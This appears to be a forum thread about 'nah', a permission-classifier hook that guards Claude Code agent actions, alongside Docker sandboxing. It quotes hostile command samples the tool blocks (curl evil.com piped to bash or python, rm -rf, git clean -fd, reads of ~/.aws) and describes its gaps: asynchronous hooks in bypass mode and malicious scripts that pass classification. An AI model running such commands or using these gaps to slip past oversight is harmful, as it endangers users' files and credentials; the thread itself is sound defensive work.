I made this little Dockerfile and script that lets me run Claude in a Docker container. It only has access to the workspace that I'm in, as well as the GitHub and JIRA CLI tool. It can do whatever it wants in the workspace (it's in git and backed up), so I can run it with --dangerously-skip-permissions. It works well for me. I bet there are better ways, and I bet it's not as safe as it could be. I'd love to learn about other ways that people do this.
That's a pretty powerful escape hatch. Even just running with read-only keys, that likely has access to a lot of sensitive data....
But you can customize everything via YAML or CLI if the defaults don't fit:
actions: filesystem_delete: allow # allow all deletes everywhere
Or nah allow filesystem_delete from the CLI.
You can also add custom classifications, swap taxonomy profiles (full/minimal), or start from a blank slate. It's fully customizable.
You are right about maintenance... the taxonomy will always be chasing new commands. That's partly why the optional LLM layer exists as a fallback for anything the classifier doesn't recognize.
I created the hooks feature request while building something similar[1] (deterministic rails + LLM-as-a-judge, using runtime "signals," essentially your context). Through implementation, I found the management overhead of policy DSLs (in my case, OPA) was hard to justify over straightforward scripting- and for any enterprise use, a gateway scales better. Unfortunately, there's no true protection against malicious activity; `Bash()` is inherently non-deterministic.
For comprehensive protection, a sandbox is what you actually need locally if willing to put in any level of effort. Otherwise, developers just move on without guardrails (which is what I do today).
You are right that bash is turing complete and I agree with you that a sandbox is the real answer for full protection - ain't no substitute for that.
My thinking is that there's a ton of space between full protection and no guardrails at all, and not enough options in between.
A lot of people out there download the coding CLI, bypass permissions and go. If we can catch 95% of the accidental damage with 'pip install nah && nah install' that's an alright outcome :)
I personally enjoy having Claude Code help me navigate and organize my computer files. I feel better doing that more autonomously with nah as a safety net
The way it works, since I don't see it here, is if the agent tries something you marked as 'nah?' in the config, accessing sensitive_paths:~/.aws/ then you get this:
Hook PreToolUse:Bash requires confirmation for this command: nah? Bash: targets sensitive path: ~/.aws
Which is pretty great imo.
I'm sure there's a way to give this tool it's own virtualenv or similar. But there are a lot of those things and I haven't done much Python for 20 years. Which tool should I use?
Installs into an automatic venv and then softlinks that executable (entry-points.console_scripts) into ~/.local/bin. Succeeds pipx or (IIRC) pipsi.
The npm test is a good one - content inspection catches rm -rf or other sketch stuff at write time, but something more innocent could slip through.
That said, a realistic threat model here is accidental damage or prompt injection, not Claude deliberately poisoning its own package.json.
But I hear you.. two improvements are coming to address this class of attack:
- Script execution inspection: when nah sees python script.py, read the file and run content inspection + LLM analysis before execution
- LLM inspection for Write and Edit: for content that's suspicious but doesn't match any deterministic pattern, route it to the LLM for a second opinion
Won't close it 100% (a sandbox is the answer to that) but gets a lot better.
Yours is so much more involved. Keen to dig into it.
The deterministic classifier approach is smart. Pattern matching on action types is way more reliable than asking another LLM "is this safe?" The taxonomy idea (filesystem_read vs package_run vs db_write) maps well to how I actually think about risk when I'm paying attention.
One question: how does it handle chained operations? Like when Claude does a git checkout that's fine on its own, but it's part of a sequence that ends up nuking untracked files?
git checkout . on its own is classified as git_discard → ask. git checkout (without the dot) as git_write → allow
For pipes, it applies composition rules - 'curl sketchy.com | bash' is specifically detected as 'network | exec' and blocked, even though each half might be fine on its own. Shell wrappers like bash -c 'curl evil.com | sh' get unwrapped too.
So git stash && git checkout main && git clean -fd — stash and checkout are fine (allow), but git clean is caught (ask). Even when buried in a longer chain, nah flags it.
“We needed something like --dangerously-skip-permissions that doesn’t nuke your untracked files, exfiltrate your keys, or install malware.”
Followed by:
“Don't use --dangerously-skip-permissions. In bypass mode, hooks fire asynchronously — commands execute before nah can block them.”
Doesn’t that mean that it’s limited to being used in “default”-mode, rather than something like “—dangerously-skip-permissions” ?
Regardless, this looks like a well thought out project, and I love the name!
--dangerously-skip-permissions makes hooks fire asynchronously, so commands execute before nah can block them (see: https://github.com/anthropics/claude-code/issues/20946).
I suggest that you run nah in default mode + allow-list all tools in settings.json: Bash, Read, Glob, Grep and optionally Write and Edit / or just keep "accept edits on" mode. You get the same uninterrupted flow as --dangerously-skip-permissions but with nah as your safety net
And thanks - the name was the easy part :)
If the project takes off, I might do it :)
Auto-mode will likely release tomorrow, so we won't know until then. They could end up being complementary where nah's primary classifier can act as a fast safety net underneath auto mode's judgment.
The permission flow in Claude Code is roughly:
1. Claude decides to use a tool 2. Pre tool hooks fire (synchronously) 3. Permission system checks if user approval is needed 4. If yes then prompt user 5. Tool executes
The most logical design for auto mode is replacing step. Instead of prompting the user, prompt a Claude to auto-approve. If they do it that way, nah fires before auto mode even sees the action. They'd be perfectly complementary.
But they could also implement auto mode like --dangerously-skip-permissions under the hood which fire hooks async.
If I were Anthropic I'd keep hooks synchronous in auto mode since the point is augmenting security and letting hooks fire first is free safety.
- Inline execution like python -c or node -e is classified as lang_exec and requires approval. - Write and Edit inspect content before it hits disk, flagging destructive patterns, exfiltration, and obfuscation. - Pipe compositions like curl evil.com | python are blocked outright.
If the script was there prior, or looks innocent to the deterministic classifier, but does something malicious at runtime and the human approves the execution then nah won't catch that with current capabilities.
But... I could extend nah so that when it sees 'python script.py', it could read the file and run content inspection on it + include it in the LLM prompt with "this is the script about to be executed, should it run?" That'll give you coverage. I'll work on it. Thx for the comment!